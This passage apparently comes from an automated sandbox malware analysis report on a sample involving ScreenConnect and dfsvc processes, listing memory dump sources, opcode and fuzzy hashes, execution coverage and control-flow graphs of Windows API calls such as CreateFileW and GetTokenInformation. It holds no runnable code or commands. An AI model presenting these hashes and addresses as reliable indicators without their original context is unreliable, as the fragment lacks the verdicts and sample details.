                                                                                                                                                  • Instruction Fuzzy Hash: 24519071A0CA5C8FDB68DF58D855BE9BBE0FB69310F1442AEE04DD3252CB34A855CB81
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4004959399.00007FFD3467D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3467D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffd3467d000_dfsvc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b13b2210a63a43cce277cebd795dc99bde782f18d25c3e1e3245ec2fa4486bf3
                                                                                                                                                  • Instruction ID: 11ec94246360a1e5d46cfe0ffa27746615bf8dfaa32fa273fb1b45600d2d3a18
                                                                                                                                                  • Opcode Fuzzy Hash: b13b2210a63a43cce277cebd795dc99bde782f18d25c3e1e3245ec2fa4486bf3
                                                                                                                                                  • Instruction Fuzzy Hash: DA41F73150DBC44FE7568B38D8959923FF0EF57320B1541DFD088CB1A3D629A84AC7A2

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:13.3%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                  Total number of Nodes:15
                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                  execution_graph 12000 7ffd34783df2 12001 7ffd3479f470 CloseHandle 12000->12001 12003 7ffd3479f4eb 12001->12003 12016 7ffd347884b8 12017 7ffd347884f6 SetProcessMitigationPolicy 12016->12017 12018 7ffd34788552 12017->12018 12004 7ffd3478f67b 12005 7ffd3478f687 CreateFileW 12004->12005 12007 7ffd3478f7bc 12005->12007 12008 7ffd3479bda3 12009 7ffd3479bdb3 12008->12009 12012 7ffd34784978 12009->12012 12011 7ffd3479be2a 12013 7ffd34784981 GetTokenInformation 12012->12013 12015 7ffd3479f2d7 12013->12015 12015->12011

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 433 7ffd3478f67b-7ffd3478f710 437 7ffd3478f71a-7ffd3478f7ba CreateFileW 433->437 438 7ffd3478f712-7ffd3478f717 433->438 440 7ffd3478f7bc 437->440 441 7ffd3478f7c2-7ffd3478f7f5 437->441 438->437 440->441
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2387910671.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd34780000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: 3ab911311a6b51223a6d078e2a9794718719cbe9faf165bc7dfa4457cac58647
                                                                                                                                                  • Instruction ID: e97e7b658de5795fd7078c895274b817dab19c3a81b2b3700898b9af85d4c68c
                                                                                                                                                  • Opcode Fuzzy Hash: 3ab911311a6b51223a6d078e2a9794718719cbe9faf165bc7dfa4457cac58647
                                                                                                                                                  • Instruction Fuzzy Hash: 99519271A0CA5C9FDB68DF58D845BE9BBE0FB59310F1442AEE04DD3252CB34A856CB81

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 443 7ffd34784978-7ffd3479f2d5 GetTokenInformation 447 7ffd3479f2d7 443->447 448 7ffd3479f2dd-7ffd3479f30e 443->448 447->448
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2387910671.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd34780000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InformationToken
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4114910276-0
                                                                                                                                                  • Opcode ID: cfc7eb34f2ced6374eb8bf7010c19b9d83b24795faea89ffd656d495eee1c189
                                                                                                                                                  • Instruction ID: fce9d378272f42dcbe30219ccbcd37c50e30b36802a17d70839f15fe7cb08851
                                                                                                                                                  • Opcode Fuzzy Hash: cfc7eb34f2ced6374eb8bf7010c19b9d83b24795faea89ffd656d495eee1c189
                                                                                                                                                  • Instruction Fuzzy Hash: 9631E67191CB488FDB18DB5C98466FD7BE0EB99315F00422EE089D3252DB74A81687D2

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 450 7ffd34783eaa-7ffd347884ef 452 7ffd347884f6-7ffd34788550 SetProcessMitigationPolicy 450->452 453 7ffd34788558-7ffd34788587 452->453 454 7ffd34788552 452->454 454->453
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2387910671.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd34780000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1088084561-0
                                                                                                                                                  • Opcode ID: a3e912e21b7c1d0a48cd9c2c1faf73fb589c021ca844da811219c7ded1300798
                                                                                                                                                  • Instruction ID: 7058c9a1a3ad5d4ee3af19b90aab4ed8751ba38116bc0e93a7612a0e88ae2616
                                                                                                                                                  • Opcode Fuzzy Hash: a3e912e21b7c1d0a48cd9c2c1faf73fb589c021ca844da811219c7ded1300798
                                                                                                                                                  • Instruction Fuzzy Hash: E321F771918B188FDB289F9C9C4A5F9B7E0EB55711F00412EE049D3211DB74B8458B81

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 456 7ffd347884b8-7ffd34788550 SetProcessMitigationPolicy 458 7ffd34788558-7ffd34788587 456->458 459 7ffd34788552 456->459 459->458
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2387910671.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd34780000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1088084561-0
                                                                                                                                                  • Opcode ID: 4fbdd3050a32b293ec4d2c168923505ac999a3c7195c49b3aa495f2fa2fbadb6
                                                                                                                                                  • Instruction ID: 9b5d4a53068648967db191cffd72aa4525e1a84c7374085d1d12cac80b3dc992
                                                                                                                                                  • Opcode Fuzzy Hash: 4fbdd3050a32b293ec4d2c168923505ac999a3c7195c49b3aa495f2fa2fbadb6
                                                                                                                                                  • Instruction Fuzzy Hash: D731E53091CB188FDB28DF9C984A5E9BBE0EB55711F00422EE049D3251DB74A8558B82
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2387910671.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd34780000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                  • Opcode ID: 2339d07c21b8fa9882e6c2c7d5327078c01cda3497e47709569d7fada50e8fdf
                                                                                                                                                  • Instruction ID: 7ac96ae02d6a1b8ad55486761681272d897b9c93328081abff1a9b780adbe1d0
                                                                                                                                                  • Opcode Fuzzy Hash: 2339d07c21b8fa9882e6c2c7d5327078c01cda3497e47709569d7fada50e8fdf
                                                                                                                                                  • Instruction Fuzzy Hash: DA21E271A08A1C9FDB58DF988449BF9BBE0EB65321F00422ED049D3252DB74A866CB80
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 0-76226702
                                                                                                                                                  • Opcode ID: 14a5e68546f5e330f218317c484cc4ce15ebf5c0da2e9bbc889c5dc924f6f286
                                                                                                                                                  • Instruction ID: 2c64d91e6fd941cccfea347c6e6829e613ba2033b50cf3d931289a820d466a94
                                                                                                                                                  • Opcode Fuzzy Hash: 14a5e68546f5e330f218317c484cc4ce15ebf5c0da2e9bbc889c5dc924f6f286
                                                                                                                                                  • Instruction Fuzzy Hash: E7519E31B002468FC759EB28DA55BAE7BE2EF85314B1484ADD006DB362EF34DD05DB90
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ['
                                                                                                                                                  • API String ID: 0-410297704
                                                                                                                                                  • Opcode ID: f815751f743458db5f1fdad3dcfee5a5c95f07e146e6d074b420ec0141986fcc
                                                                                                                                                  • Instruction ID: 787f1ecc63fbd3c979d821e608b3999c4e686784ef116af7603c9de0bdb0fa58
                                                                                                                                                  • Opcode Fuzzy Hash: f815751f743458db5f1fdad3dcfee5a5c95f07e146e6d074b420ec0141986fcc
                                                                                                                                                  • Instruction Fuzzy Hash: 7E31FE35B002029FC705EB6CA99596E7BE2EFC475030485ADD51ADB340EF78AE098BD0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0f198a98fba0267966eb55153298bb6351893d4386539d4fc1dc7510482d56ef
                                                                                                                                                  • Instruction ID: 8ea203eab5dc1c51489e812289f025fb13603dcf8ec96d65ec94e5ef542f2496
                                                                                                                                                  • Opcode Fuzzy Hash: 0f198a98fba0267966eb55153298bb6351893d4386539d4fc1dc7510482d56ef
                                                                                                                                                  • Instruction Fuzzy Hash: 0D61EE30D043498FDB06EFB8D854BD9BFB1EF86300F15819AD144AF2A2DB78A949CB51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ab8d104f305d34b41bf3c4a70736fffc87534b05708ee8e876cc7d7dd50482a9
                                                                                                                                                  • Instruction ID: 1fc63e29333710f58789b84665c4f033c97df9d8ef932732f2557e21800c000f
                                                                                                                                                  • Opcode Fuzzy Hash: ab8d104f305d34b41bf3c4a70736fffc87534b05708ee8e876cc7d7dd50482a9
                                                                                                                                                  • Instruction Fuzzy Hash: 0C61F534B106058FCB14DFA9D894EAEB7F2FF89715B548168E506AB365DB30EC01EB80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 44d979395ebd731570f7e720396a0ffa4f8d9aa27df7daeced773074cb228f6f
                                                                                                                                                  • Instruction ID: c7785d316d53b11db4fb20ca6bd6792aafc393c602e65f18ac6eeaef2723445b
                                                                                                                                                  • Opcode Fuzzy Hash: 44d979395ebd731570f7e720396a0ffa4f8d9aa27df7daeced773074cb228f6f
                                                                                                                                                  • Instruction Fuzzy Hash: 0F511430F042169FDB24AB64DA59B6EB7F2BF84310F14856DE446DB2A1DB309C45DB80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fbccf23c0ac4506a309732a02b005431bc6180ef9f411f9d0c13bdcd8604726f
                                                                                                                                                  • Instruction ID: 9d64967947618dfb585c27990f0f0e818e78d4a1d15430f8216ba34056c8eceb
                                                                                                                                                  • Opcode Fuzzy Hash: fbccf23c0ac4506a309732a02b005431bc6180ef9f411f9d0c13bdcd8604726f
                                                                                                                                                  • Instruction Fuzzy Hash: DE512734600A02CFC724CF29D994A66B7F2FF8D324B244A5CD49A9B7A0DB31F805DB44
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3ec4c52b8b762eacbc2483871634942e3c60fc2fafd26d1b7fb2af792ba092ed
                                                                                                                                                  • Instruction ID: 3038c830a51aa2b2df19deac31de1c215336cb575c5850bfacce8b7f1c1a72cd
                                                                                                                                                  • Opcode Fuzzy Hash: 3ec4c52b8b762eacbc2483871634942e3c60fc2fafd26d1b7fb2af792ba092ed
                                                                                                                                                  • Instruction Fuzzy Hash: 24518C30E103099FDB05EFB8D844B9DBBB2FF88300F109569E108AB695EB74A995CB50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: feef8ff512fb40de6234f32277e595c4e63d10d7e7299180abbdbb91811bda2c
                                                                                                                                                  • Instruction ID: 467231f2d8636cc7975eebc63ec1c9f48b10b5ee1e5558edf58476f8c8b7a0c1
                                                                                                                                                  • Opcode Fuzzy Hash: feef8ff512fb40de6234f32277e595c4e63d10d7e7299180abbdbb91811bda2c
                                                                                                                                                  • Instruction Fuzzy Hash: 2641BF31A0010ACBCF19EF68E594BADBBA2EFC4314B14C569D905AF245CF34AC06DB91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 38314e353171bd02734dbe9ff7473f9361c885caf6e9df7a8d8d37daf1e3c296
                                                                                                                                                  • Instruction ID: 36c14dc5db30057a7ef025ace474117356e58440e597a9ba2b1c7d8469851df1
                                                                                                                                                  • Opcode Fuzzy Hash: 38314e353171bd02734dbe9ff7473f9361c885caf6e9df7a8d8d37daf1e3c296
                                                                                                                                                  • Instruction Fuzzy Hash: 9B412FB4A006068FCB64DF29D945B6ABBF1FF88350B108A2CD456DB6A0DB30E945DB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2b141bc0e117e6bec45b65e8120fd11810bca4657fb9c4ff5ea33aaeb51a8783
                                                                                                                                                  • Instruction ID: 372ab1512c7f4a72c54016acfa9e4f9fabc8e3c89c0093ab4aeb11d9e24edf59
                                                                                                                                                  • Opcode Fuzzy Hash: 2b141bc0e117e6bec45b65e8120fd11810bca4657fb9c4ff5ea33aaeb51a8783
                                                                                                                                                  • Instruction Fuzzy Hash: 17414074A00706CFCB64DF29D945BAAB7F1FF44360B108A2CD456DB6A0DB30EA45DB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 95b106fa444e8efc2526fb00ab49cbe6e31f84a2c4516e0862fc77072b14ca6d
                                                                                                                                                  • Instruction ID: e48ba5957f57665488d391f3281004f1b090cf049bfe64814421899554fcb92a
                                                                                                                                                  • Opcode Fuzzy Hash: 95b106fa444e8efc2526fb00ab49cbe6e31f84a2c4516e0862fc77072b14ca6d
                                                                                                                                                  • Instruction Fuzzy Hash: F1317A31B002068BCB149F69C959BAFFBF6EF89394F10846AD506E7350DB70DD089B91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8216eb22fc2920e157e7af83a212183fc2ce7771bbf18e15374ae103f8bbc3a8
                                                                                                                                                  • Instruction ID: 57a01a15548c85b3b9f44aaaa0b7e6dc2e6dd82f92ffa3667a61fa5feb580208
                                                                                                                                                  • Opcode Fuzzy Hash: 8216eb22fc2920e157e7af83a212183fc2ce7771bbf18e15374ae103f8bbc3a8
                                                                                                                                                  • Instruction Fuzzy Hash: 5831F431F042468FC7159B68C855A6EFBB2EFC9350B1481BAD508DB391DB348D01C7A2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7b645569593fef20f85da9bae5119ea7fc0b1d5209c4c76340c7c12fed4c5835
                                                                                                                                                  • Instruction ID: d0af4ce0595018525905b1f656d382427af721a761691b8c56af2183f1e708e1
                                                                                                                                                  • Opcode Fuzzy Hash: 7b645569593fef20f85da9bae5119ea7fc0b1d5209c4c76340c7c12fed4c5835
                                                                                                                                                  • Instruction Fuzzy Hash: 1331E331F042468FCB15DB68D855A6EFBB7EFC9350B1481AAD508DB391DB309E01C7A1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 210dcfb80b9df09133dc1b4384cf6d02e113588b7c5bf062bb7705a9f1f1d001
                                                                                                                                                  • Instruction ID: 4edbc20318f6f428d00469f6422ac1945aab76b55f9bdd6916ef27a076f1d567
                                                                                                                                                  • Opcode Fuzzy Hash: 210dcfb80b9df09133dc1b4384cf6d02e113588b7c5bf062bb7705a9f1f1d001
                                                                                                                                                  • Instruction Fuzzy Hash: 81314C30A00B068FC734CF29D985A6AB7F2EF89724B544A1CD496DB7A0D730F845EB91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 268996d793c4152307bbe5f6a30d3dd2adaa10a3af6e45222bdc14bbb2567e72
                                                                                                                                                  • Instruction ID: e6cb36737fb648a3ad224f3a9bf22d826d0b60a0811e4f020ce4ad980e9ba20b
                                                                                                                                                  • Opcode Fuzzy Hash: 268996d793c4152307bbe5f6a30d3dd2adaa10a3af6e45222bdc14bbb2567e72
                                                                                                                                                  • Instruction Fuzzy Hash: 49317C36A0021ADFCF05DFA8D9409CDBBB2FF89305F11856AD5057B261DB31690ACF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2daecce383ea9f6bf16f2f2feb196362724b508c1b035a8c05a5a184912c562d
                                                                                                                                                  • Instruction ID: 42ce5ec7592a68687735f81483eade0d05a66b7e1c326a27ba55711a1b06cf31
                                                                                                                                                  • Opcode Fuzzy Hash: 2daecce383ea9f6bf16f2f2feb196362724b508c1b035a8c05a5a184912c562d
                                                                                                                                                  • Instruction Fuzzy Hash: 24110635B002009BD705EB68E955B7EBBB2EFC5710F008969E505AB381DF786D09ABE1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7503f6d31b9a1b8829d0ce6fa9a0bc165d5f0adef3ec0f0e049981ddd0d89d1e
                                                                                                                                                  • Instruction ID: 2f2659bc273c8c85776e7da3a502095ea0c661b83ae03c97e072ba678159b531
                                                                                                                                                  • Opcode Fuzzy Hash: 7503f6d31b9a1b8829d0ce6fa9a0bc165d5f0adef3ec0f0e049981ddd0d89d1e
                                                                                                                                                  • Instruction Fuzzy Hash: D5212C316006068FC734CF25D959BA6BBF1EF84320B108A2DD492976A1DB71F94AEF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 177435edebf64c25a39f4cc11293546a9ffd1595a6a062fbe607c5934c938181
                                                                                                                                                  • Instruction ID: 1722f6ecd573f85a60af28757c3a2bd325428f2bf1796994d607936dd32d4d8b
                                                                                                                                                  • Opcode Fuzzy Hash: 177435edebf64c25a39f4cc11293546a9ffd1595a6a062fbe607c5934c938181
                                                                                                                                                  • Instruction Fuzzy Hash: BF11C431B00205ABD704EB68ED55B7EBBB2EFC5710F408929E505AB381DF78AD099BD1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fdb7c9e980a38aebe0c3be307e52a2d823fa10b7f4145a64a315dea9bacf2cf6
                                                                                                                                                  • Instruction ID: 80de9704ea37f8390f26699eb09bd0bb32080189ab6e0204889d8bc50be12d04
                                                                                                                                                  • Opcode Fuzzy Hash: fdb7c9e980a38aebe0c3be307e52a2d823fa10b7f4145a64a315dea9bacf2cf6
                                                                                                                                                  • Instruction Fuzzy Hash: FC110431B042119FCB15DB68E88099EBBB5EFC5370308866AE948CB352EA749D45C790
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b19cadb9cc6563a19162f0171dba4460190d865e35ab577e0e5d7a582b71cbac
                                                                                                                                                  • Instruction ID: 80dda68bc6a979c1155c505104972b37a7fefb519b8fcc931a2160725f953ea6
                                                                                                                                                  • Opcode Fuzzy Hash: b19cadb9cc6563a19162f0171dba4460190d865e35ab577e0e5d7a582b71cbac
                                                                                                                                                  • Instruction Fuzzy Hash: 08112E3290020A9FCF41DFA8C9419DEBBF1EF49314B5081A9D508BF261D7756E0ACB91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 227e29290fcaabbfea7bb70d3a0edca26e265579f7bf2396126aa3b1fc949aef
                                                                                                                                                  • Instruction ID: f032adc60f646d336df1b7335f05ffb14563379c0daedadd89b94138d11a321f
                                                                                                                                                  • Opcode Fuzzy Hash: 227e29290fcaabbfea7bb70d3a0edca26e265579f7bf2396126aa3b1fc949aef
                                                                                                                                                  • Instruction Fuzzy Hash: FA01F932F043265FCB059B68D805A57BBE9EFC4324710496FD409DB351DAB1AC018BD4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
